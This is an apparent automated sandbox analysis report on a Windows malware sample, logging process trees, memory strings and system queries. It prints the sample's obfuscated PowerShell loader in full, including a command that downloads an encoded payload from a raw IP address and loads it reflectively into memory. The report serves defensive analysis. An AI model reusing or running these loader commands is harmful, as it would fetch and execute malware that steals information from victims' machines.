8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat text
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat text	Jump to behavior

Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\VMf
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\13<M
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\}M{
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\k`M
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\M
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\21
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerDMt
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\k
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\*MJ
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\#MQ
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager;
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\XMX
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\QM_
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, registros.dat.15.dr	Binary or memory string: [Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00433E0A cpuid

15_2_00433E0A

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoA,	15_2_0040E679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_004470AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	15_2_004510BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_004511E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	15_2_004512EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_004513B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	15_2_00447597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_00450A7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_00450CF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_00450D42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_00450DDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_00450E6A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00404915 GetLocalTime,CreateEventA,CreateThread,

15_2_00404915

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041A7A2 GetComputerNameExW,GetUserNameW,

15_2_0041A7A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

15_2_0044800F

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

